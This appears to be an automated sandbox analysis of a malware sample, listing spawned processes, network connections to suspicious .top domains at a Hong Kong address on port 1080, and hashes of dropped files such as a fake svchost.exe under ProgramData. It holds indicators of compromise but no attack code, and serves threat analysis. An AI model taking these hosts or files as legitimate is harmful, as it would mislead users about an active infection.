"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3912,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3872 /prefetch:2

C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4728,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3324,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5568,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5600 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5684,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5696 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5732,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5752 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=508,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4024 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4012,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4236 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4244,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5680 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.yydsnb1.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.nbdsnb2.top udp
GB 216.58.201.99:443 o.pki.goog tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.nbdsnb2.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 a17.nbdsnb2.top udp
GB 216.58.201.99:443 update.googleapis.com tcp

Files

C:\Windows\Installer\MSI94D8.tmp

MD5 c7fbd5ee98e32a77edf1156db3fca622
SHA1 3e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256 e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA512 8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

C:\Windows\Installer\MSI97DA.tmp

MD5 ae463676775a1dd0b7a28ddb265b4065
SHA1 dff64c17885c7628b22631a2cdc9da83e417d348
SHA256 83fbfcaff3da3eb89f9aec29e6574cf15502fd670cbb2ab0c8a84451b2598b22
SHA512 e47c2db249e7a08c5d2864671fbc235e48aebecbe0b2c2334d1a4cba1b5b3037522ff89408589f3559b3a1eaf507bd338645387d55800029bb3b941d4c7744d6

C:\Config.Msi\e58947e.rbs

MD5 0b2a2d5f6717f43ec2e2adb891801af0
SHA1 5b3197f45561e8d4a9f42dd2fb4ef32b71c9990a
SHA256 343b39585137983ac3de61dc23cfc35e9bf39b5d384a4f11c0a743d1af6df64d
SHA512 1e870cc5467ed3a9a226b3256a63ab433e260341910e21de90c1cfc41d12ea0a075d94887f4f14d76443a4205522359e735b6200202825076425e40b06b6f8b2

C:\ProgramData\setup\aa.exe

MD5 09c448be7e7d84e6e544cc03afbb05d8
SHA1 ddc13e71a72bc49c60f89b98cbb79c2449cfa07e
SHA256 a0f127a70943b0262060498c1723c795a8e2980f1acf0c42ee8c1dae72ae54b5
SHA512 e5f7a988a999e7e34d0aa2d2a5b2fbb22689588d3def4bed4518ceed38710e3714c5614bab192b0ce6bcac5172a87ebf3b3b923e495eb7344c70bd11f4bf1c12

C:\ProgramData\setup\ddd

MD5 9bd359e3956d119811c3a6abef58e644
SHA1 9f221781f406ebcb15fc2c02d5d259116155c734
SHA256 ead38673817c84de77a4d2fe6118e6a96f863e3db38f73518007caa2af676146
SHA512 7f817794728e532da07424c621eeef161501644d137068895391505d7110f1f8ee9dc76944946e3960f84e462c66fd82ee61b619ca91a07166aed5d3434f618b

memory/3300-64-0x0000000000400000-0x0000000000510000-memory.dmp

C:\ProgramData\Packas\scrok.exe

MD5 a03b2eaa4d517fd935bb0032d444f22d
SHA1 014864aac638b7c04b4d50e6c39d7266eafda773
SHA256 6fd145b1de7d0a143fd25274544d5e3c4ecee06cf3e31631d51cae8ca3e25f01
SHA512 68a253fcdb3cd1a086fe93fa7c8a7500d6b5414bdfc0dad555973697d4fb552e09088b849573f705ca91b1652ddd4572842b82d40f5821761b3ac299e465be51

memory/5088-68-0x00007FFD6DFD0000-0x00007FFD6DFD2000-memory.dmp

memory/5088-69-0x00007FF683160000-0x00007FF683719000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

memory/3800-75-0x0000000000010000-0x00000000000E6000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.xml

MD5 2c706293a3cfff8cc184a8e9a3b3da08
SHA1 873d7c9f51aa6cebd4ad3ae5930d1de84bb4437d
SHA256 ed28baf8be3a588d50ed246c2cd741bbd498aee74ea0675d57e0b33236e22067
SHA512 4aba3e25507ba5c29219ff51553f3616d07aeeb30f7465f9e921eea94cdcb411d1f48d1eefed647c22405df275e7f9d7506aac52202aae137391c6831463b043

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log

MD5 065ba7ab4a148dd96ec21e112d3f71db
SHA1 18e9ca2d097e6f1e3b0b944e8d32b321bcde667d
SHA256 6a36e0ff68fc9afc92361191bedcde371ed1a05a9e8e19290583a890493f7b62
SHA512 049d43d80cb6806aef2f3828c6505660d53d05e5fb338f00f830a231da836b3ea493994b78d4ed4d7b7939cf4cc27ca927c765c2372e9b385caf64f4a906c720

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 cd25d84cb2b6297efa86a78fa30bef7c
SHA1 2ec18a789579458825b880ad3735a941e0abade7
SHA256 c17ebe077c31e3abccf5c36ca3296d711be2fd4cdb2d19abde5ca3071db84f7c
SHA512 e78b8aebb2ac46b58f8ebcad4d419056d4f0f8606c9d7701074105901c1e22094d7f3a5d809d0e54b57c0453e6d45ad7e5efdec657e111ca4a08ad29cae17531

\??\Volume{f821e193-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{f5686bde-39e9-4f7b-8040-61c25c8dd766}_OnDiskSnapshotProp

MD5 fed334809e549ad04c2423c1420aa6c5
SHA1 61094dfa31bda36c373b5f988c12d458964c576a
SHA256 c98e29acd5396c0a47ccd2d89109cae1f58be17c4282cad610dbd62e9482c0a7
SHA512 52c11c577115d238992f8748fc4e58074796c69921151ca920d11c758583973dae36346142a73159c638b1fa8a4053c4c8d69dd6724ab2b96cc5069378b858fa

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 219c204f7d70b9ddba558d5fc6211570
SHA1 108ab0efed3ad1e56809518fb76a3719de4a05d0
SHA256 78acf9914bebac73b29cfd3fb47318e4e97ce6ae5038efbd8992b36b97b68d08
SHA512 5916d0acdd8cd91bac68e6f2a970e169fce933025a04dc13f474df3a4649738ecb3c3b454a4755ec4051518cfc7b3952d4577b65eca12bd1789e0c7be9f2f155

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 d6e64dd3238de1fc7f8e2e306ccc19b6
SHA1 8197843aab59735597330a1c00232194d15e970a
SHA256 8ca90861d4195cba907bff155de9f576237844e9fed14e54b5184ff661f7c394
SHA512 593747f349f815a7eac979444af34371f2f17daeadd666bec336267ca96183702f3d2154d4da4701a5f88f43f65faad3925e191bf3a9b04f0ac369ac4058f08f

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 a77f75c139ca013cf2679e7e00de2cda
SHA1 6afaf031ad95ca599b09b79559e53fc29a1d837a
SHA256 9d783dfc83d8ae488edb062f19a275340df93b623c63453e81839ccba0090414
SHA512 540f8dd0f42fafa1baebc9da3b44483723d17d91ebde1df1807d7686dff232cc35c720b0aa461775fba23227c9d3eef64273c0bea25d2fdb3988dc455db121ed

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 56c67ddf8f8feccc65eaea5984fd8fc3
SHA1 16d23a20d2d6786f9c87e2f0c1e4333efef25f50
SHA256 909ff7323bc4661b08611227218292bedaaa7ea0a1388e1be43f1218130a28fd
SHA512 55974eb892ac55a8b92dcaa4940b24d8c8c2841ee932546d33f19409ded03edfef6b125e23c3bb15ee0e1ab4e0cd0ee1f5eda5fa9486ec7ac5adb2500b0c3353

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 a2d9f40942adbface9127f7ade46c6f4
SHA1 c8ab431521c668b87cd94b5ba00e3a381db6b88d
SHA256 1e92582b3e5045d6f57a021423f66c680b9c65c2d09d6da7e913c7d10665a4f9
SHA512 54746349bc439675d82ad491c8b7ad20749b8d5582faa37c3ea5d79c02d05faca7ea28317d5e62652b461637957fc93f1a27bbccb03b96bba46bd200599d63e1

C:\ProgramData\Smart\setup.exe

MD5 118a9a9f6280e177fdac16989b8aa1a5
SHA1 fc37316439372be17a982d02cd0d294f7aaca751
SHA256 b995e6a0299f2465fd5881157aab1c6c9753c8e459efd661b9cd1e83be7e53f6
SHA512 14c731e7f7e9736f39d6c79a98bf1a3264da9dc76bab4faca82ec64f276f3d39c9bc4638991e30a06f52bf6204619f5da8c3168d11afe058e0c1d21a89d42878

memory/1140-114-0x00007FF683160000-0x00007FF683719000-memory.dmp

C:\ProgramData\setup\setup.exe

MD5 4a94844260d6a08828d781d488cef61d
SHA1 de8169fdb5ab8a120df577d92eb25a2767431738
SHA256 46d7a8abe3bb9d7302529246cd8ee6e7d0360d1045fe92662cc7580e72ef5132
SHA512 82549c1e525a90003fb0174ebba2bc3b4f58706ef9fd5e6ee07d489ab536ef286e408db6c15a52b039d3f59c09bd55e35d045def79007da5d414d5d589d34f4f

memory/4060-120-0x0000000000D90000-0x0000000000D91000-memory.dmp

memory/4060-121-0x0000000000400000-0x0000000000BA0000-memory.dmp

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe

MD5 cdf152e23a8cbf68dbe3f419701244fc
SHA1 cb850d3675da418131d90ab01320e4e8842228d7
SHA256 84eaf43f33d95da9ab310fc36dc3cfe53823d2220946f021f18cf3f729b8d64e
SHA512 863e1da5bc779fa02cf08587c4de5f04c56e02902c5c4f92a06f2e631380ecabcc98e35d52609f764727e41b965c0786d24ea23fc4b9776d24d9f13e0d8ae0c2

C:\Windows\SystemTemp\GUMCB99.tmp\goopdate.dll

MD5 dae72b4b8bcf62780d63b9cbb5b36b35
SHA1 1d9b764661cfe4ee0f0388ff75fd0f6866a9cd89
SHA256 b0ca6700e7a4ea667d91bcf3338699f28649c2e0a3c0d8b4f2d146ab7c843ab6
SHA512 402c00cab6dac8981e200b6b8b4263038d76afe47c473d5f2abf0406222b32fff727b495c6b754d207af2778288203ce0774a6200b3e580e90299d08ce0c098f

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_zh-CN.dll

MD5 ca52cc49599bb6bda28c38aea1f9ec4e
SHA1 494f166b530444f39bca27e2b9e10f27e34fc98a
SHA256 f9f144aa2dc0de21b24c93f498a9b4a946b7da42819a776b3283a0bcae18544b
SHA512 05e2d5711eef8f57737b2512de2e73744f17e0a34de0bfd2a06c9cc60a08ebadbafe38e30b66a2ede7fa61d5b9571adddcfbd7e1cafcee1ab2168a563d2d3f0d

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateCore.exe

MD5 af51ea4d9828e21f72e935b0deae50f2
SHA1 c7fe57c2a16c9f5a5ebdd3cc0910427cba5308bd
SHA256 3575011873d0f6d49c783095dae06e6619f8f5463da578fbe284ca5d1d449619
SHA512 ec9828d0bade39754748fb53cfc7efdc5e57955198bac3c248ea9b5a9a607182bb1477819f220549a8e9eadbe6bf69a12da6c8af3761980d2dd9078eaeaa932f

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_es.dll

MD5 dae64d49ee97339b7327b52c9f720848
SHA1 15f159c4808f9e4fe6a2f1a4a19faa5d84ac630b
SHA256 e76400e62ae0ab31565e50b05d1001b775a91aa487a54dc90e53c0e103c717c2
SHA512 9ae72e5a658aa0e1fb261d62ccef474cd42d9bec2b4a50f71925d131ffea22b8f60fb961772587ce71cb30a32da3b7986e7483ecea960a509e0450d3983c84b0

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fi.dll

MD5 5c530468d61708123c8919a8480e5967
SHA1 2d85a2335bc688d2c2045299c1e36b39b179603e
SHA256 21aa3b8d540c7b2ea33c4a11fb35fdd721b69f04a660edb2ac2031d98f38e239
SHA512 bfe4ce4762ef5de853635a2341249012da27b7a02e3f4722841792345527d7951fb20661d1b7c8a58293c4ac5ee0b34cea0e190fa5f74efd12aeacba3c74a2aa

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fa.dll

MD5 90d38d6669931e76faa1e69aee2ab3e2
SHA1 e0de420b422c7ad4e73ace2c84db45f6db2b1d6e
SHA256 1fe4bc690efc72cb8737d4b451c2c843d2987d71bf60723471bf66cf53fcc714
SHA512 1cc66e166b4dc3b6c1f96340489652bd313d8d6de31a3165bac9da8fd42146843f840ee7a5f163512163fc8f90b865a06cc29a147c44389f40eb1edafd6d3743

C:\ProgramData\NVIDIARV\svchost.exe

MD5 4ce1a842d3d770f6fa4b4167542408b2
SHA1 43b0c03b176318ce2551d3dfc2c18e18f53c2240
SHA256 ba51980ef9681d849c9331e891cc411c1687d3c011f0acc01da9f4ef640764b6
SHA512 a28f0659af75da93f479359212dc4ffb9440f171cf89b19de929b7a8015b5e087ea53ab979dd6815597865538c79b1e3354e987940da88da4dfcf16bdf1f4337

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_et.dll

MD5 dfa1d51ca956e3aaa1008503aaeb3dd8
SHA1 94511faf996c1ce9b2397c7fc3f78f32fbf8f966
SHA256 3781d18bab1524cff8104167caaccb7eee6614394068dbb7b7c412c7c9b5aae9
SHA512 b25f9a14053acab26f1d353e9d908cbe769a640d0e8d66c30209c2a5d76c503b8e7fb04651f37ff482f7c4df4ffed33013d37b1f7bb6650e25447006f447b85d

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_es-419.dll

MD5 1c0b1c3625c9ccace1b23e0c64095ee9
SHA1 3904a80d016e0a9a267c0b5feb8e6747b44b5fa1
SHA256 f030757e1911e9efde0d74a02c22694fa5ef139f73897a7f97acab9da05f7c8b
SHA512 0a988edef8d67cd83c2be65cbfa07059df311732ee92ad73fb9411d7cf7d853a2b8d2ab801733d05ab6afaccab33a2684117bbc1d80b362b677cc53ae9de42f0

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en-GB.dll

MD5 f82ccf890c3ae14bfd7a263d07276e60
SHA1 6a915d6eb8c99d065e36a721d721d556b74bb377
SHA256 6b07a4fd3039541e30c68a8c31c371cda2cea480787f95e0ddbca3cc2fbff0cc
SHA512 4cbf9e6728e08de8d61f34b17bb20d92b6a699969edb9afa013fe962c8fd39238288adcd826134c9bca459904d8574a804c519daac6b301e0d38f68722c0359e

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en.dll

MD5 741211652c66a8a6790396e1875eefa9
SHA1 2ccd5653b5fc78bcc19f86b493cef11844ba7a0c
SHA256 e0945deacdb6b75ff2587dea975774b9b800747e2ee3f3917e5b40ddb87eda10
SHA512 b70f847d8ca8828c89bbb67b543950fbd514c733cf62b52ad7fc0dab7b2168fe56d1f21bef3210f5c7f563f72831455d870a5f9aa6c557f1e3543ef7329c42f9

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_el.dll

MD5 ecdd26049573614b6f41d8a102ffcf21
SHA1 5140c6cff5d596267a64df1559ac36c4e8f49e42
SHA256 a3377520f2a95b8cc06bd30e493962c07f97eebf4661a69d03efb36b2ca515c5
SHA512 933c181d7575f20480c8deadac3f3e9190081456169122216c72e7b9a04aa75612140fc37697098c7c20b77001a67966fa1661cdc9110c40634c944f833a65b1

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_de.dll

MD5 96d92500b9a763f4b862c511c17e0a47
SHA1 2fd441eb8685d15e14fa6405e82359adea3e7148
SHA256 58829d135ff41e574ed5fc5e0421e4aa204267b02ca3ffaf08d8efb0a70fdd4c
SHA512 a1014584f1f278160d579848fa188f627676aee819e9395517490b00e273db6f583d7ddd31af6e35c9d251021df7fb26c88512aaa1c865c2ee3ba60c0a2db49a

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_da.dll

MD5 9f2e018a4f9a1d278983d0b677b91218
SHA1 c58ee1fc0d8ef9d99f85426b48c7f28f381a2c17
SHA256 d0dcdc68236eecd6b5f0b437eb92b8935741dabf1fa276a552399815af22edec
SHA512 20b74b6a9f81527d4a5fe30671d2559261fb682576f4ab04da7856280fbbaeb6af83894009c9d7cb83deeae988d0ac5ec7ec32b277b7eb45829faec2857d7014

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_cs.dll

MD5 b9033db8d0e5bf254979b0f47d10e93d
SHA1 2859de0d851b5f4fd3056e8f9015cece2436c307
SHA256 12c41c2f472b6a05fd6392e9d4f8aeb9a40840c2cbefd68b39d20f9d1d4d77ed
SHA512 52075df4ae5c86ebb0bac20604ea072a163761ae058c1473211bf4bb0eeed043cfc5a92386f876b53484cdf4e3f8a7b75d8f4bf9894c24f8c22ec23a50b70b7c

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ca.dll

MD5 39e25ba8d69f493e6f18c4ef0cf96de8
SHA1 5584a94a85d83514a46030c4165e8f7a942e63e2
SHA256 1f66ebdcaae482a201a6e0fab9c1f4501c23a0d4ad819ccd555fdca9cc7edb94
SHA512 773c995b449d64e36eb8cab174db29e29e29985bcfd714799d6b05b01bb7d4a0fc2aefaf2e27ff02b0e105fbe0d34d7efe29b193a1bc3365ec47e1f1003bed26

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_bn.dll

MD5 dafa45a82ce30cf2fd621e0a0b8c031f
SHA1 e39ed5213f9bb02d9da2c889425fab8ca6978db7
SHA256 d58e5f0fa894123de1d9b687a5b84826e095eca128ee5df8870f2db74f4233a2
SHA512 2b772ebc128eb59d636eec36583329962ead8e0a399fd56394b1244486bf815f4e033ceef74a62a9930ab2bf6ec1ba5e2d3c942183f7cb2355a716a3e2c6c7a1

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_bg.dll

MD5 c523ec13643d74b187b26b410d39569b
SHA1 46aff0297036c60f22ad30d4e58f429890d9e09d
SHA256 80505863866bcd93a7e617dd8160531401d6d05f48d595348cd321cf7d97aeac
SHA512 ecf98e29a3481b05ab23c3ff89fa3caf054b874ed15462a5e33022aacf561d8fea4a0de35cc5f7450f62110ca4ace613e0c67f543ad22eb417e79eb3ebf24ed7

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ar.dll

MD5 163695df53cea0728f9f58a46a08e102
SHA1 71b39eec83260e2ccc299fac165414acb46958bd
SHA256 f89dddda3e887385b42ea88118ba8fb1cc68fde0c07d44b851164564eb7c1ec8
SHA512 6dfb70a175097f3c96ae815a563c185136cb5a35f361288cc81570facfa1f1d28f49eaa61172d1da4982ebb76bd3e32c4de77cf97dedfb79f18113d7594d0989

C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_am.dll

MD5 849bc7e364e30f8ee4c157f50d5b695e
SHA1 b52b8efa1f3a2c84f436f328decd2912efeb1b18
SHA256 f1384a25a6f40e861455c62190d794415f3e9bfca6317c214847e9535dfc3fb9
SHA512 6fd7f542a7073b3bbf1b0c200bb306b30f1b35a64a1fb013f25c7df76f63ef377d9bd736e8da2e9372f1c994785eaeedb6b60e3a0d4a4e8734c266ad61782d3b

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateComRegisterShell64.exe

MD5 be535d8b68dd064442f73211466e5987
SHA1 aa49313d9513fd9c2d2b25da09ea24d09cc03435
SHA256 c109bcb63391ac3ea93fb97fbdf3f6ed71316cacb592ef46efaea0024bc9ed59
SHA512 eb50eebeaf83be10aea8088e35a807f9001d07d17d2bc1655c3bc0cb254d0f54303348988514ba5590ebd9d3bde3f1149c3f700f62fbce63c0199ea3cfb1f638

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleCrashHandler64.exe

MD5 b659663611a4c2216dff5ab1b60dd089
SHA1 9a14392a5bdb9ea6b8c3e60224b7ff37091d48b5
SHA256 cad4aa1cf58f6b2e2aceb789d53b18418e67066ec406b2fac786cb845ef89d2b
SHA512 1065f9072cd6f1f4364f1354108f2647ee1d89f87e908a22fcd63bd3149c864c457e62268067a439d0486d8d4aa150aa984ad8ac8b51cae49014b67b80496040

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleCrashHandler.exe

MD5 a11ce10ac47f5f83b9bc980567331a1b
SHA1 63ee42e347b0328f8d71a3aa4dde4c6dc46da726
SHA256 101dbf984c4b3876defe2699d6160acbf1bb3f213e02a32f08fdcdc06821c542
SHA512 ff2f86c4061188ead1bfeebd36de7dbc312adcc95267537697f2bfcbb0c53e7c4ab0cd268cef22f0182391796c4612c97cbdc1266d9ee1960cdd2610d8c2bcb3

memory/3048-225-0x0000000000400000-0x000000000090B000-memory.dmp

memory/4696-222-0x0000000000400000-0x000000000090B000-memory.dmp

memory/3048-228-0x0000000010000000-0x000000001002D000-memory.dmp

memory/4696-233-0x0000000010000000-0x000000001002D000-memory.dmp

memory/472-242-0x0000000002A00000-0x0000000002C00000-memory.dmp

memory/472-241-0x0000000002A00000-0x0000000002C00000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 0c899731921f1c56c52220723bcfad26
SHA1 fab13d09d64d3992c48f7e3fba62c0046b3a813e
SHA256 959a371c94dfab9224e5ed208e1f874015d0c8e37f6467aca6b32b0174c2c8c9
SHA512 9b482990fcef581bfca2ee9e16f3394cce197db56c699571e2a5340bb4642baaca2fa025f9404e941e630eca8b207a6241be5c640739c636bade03f3b224b2d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

MD5 505a174e740b3c0e7065c45a78b5cf42
SHA1 38911944f14a8b5717245c8e6bd1d48e58c7df12
SHA256 024ae694ba44ccd2e0914c5e8ee140e6cc7d25b3428d6380102ba09254b0857d
SHA512 7891e12c5ec14b16979f94da0c27ac4629bae45e31d9d1f58be300c4b2bbaee6c77585e534be531367f16826ecbaf8ec70fc13a02beaf36473c448248e4eb911

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

MD5 b77fc97eecd8f7383464171a4edef544
SHA1 bbae26d2a7914a3c95dca35f1f6f820d851f6368
SHA256 93332c49fab1deb87dac6cb5d313900cb20e6e1ba928af128a1d549a44256f68
SHA512 68745413a681fdf4088bf8d6b20e843396ae2e92fbb97239dc6c764233a7e7b700a51548ff4d2ea86420b208b92a5e5420f08231637fbb5dbf7e12a377be3fc3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 1799abb1aea0e80a481631cd2ceec950
SHA1 ce5a20a8dfa26d3d7c063964bb3d31f64d9c1580
SHA256 f5a6f810b6e670ba171ff75308194902ea0a7bf569027e9d90064670890ff3c5
SHA512 75da42c7e3cf5c21f5710359330b82e250f3fdff9e74b479f3c4674885e24b632bca634bfdf6d12b5872ff9a4769f8837ede71e10b84454c16f42b9108dd4847

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6f1a6bb37ef72ff55ac002218da5e4db
SHA1 84acae709016d1fbe1263edbcdd224fb83c7d823
SHA256 23721fc4065a7ec318d6dbdfa72514362e3304b06eb28483479306bba53e1448
SHA512 cf4d1bc69591887d7023b826ab4d8e361e5c448a5036aa029dae5597521c438e8a9949d44a63a31780bef543617b2e4257bf1ca94afe7ff696166206cf3b6e81

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0d0ed23ddf914e32a9900d01b981de3f
SHA1 c0235b6d571955d4e408b33fa3786d2add747464
SHA256 d914d97d40aced7300013fd46eda66cd583c923d57bcd8c6101339d93d660c8f
SHA512 4081812d9b196ae9f843c6999d83bb377e23c3d27c13460ea49353e706fc8121078635041b56233b9c06b6e0f9d849ce6f15dcef874ed7be739da82d115742ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 803bd80017c599fd55d8d0b3041b6bdc
SHA1 911505008fa5a0cc53ee6269e4b49bcb3a8d9fc6
SHA256 b6e42bb3d1614136703670565671ddeded53e18ed8ea50a6edc075ac4104fc64
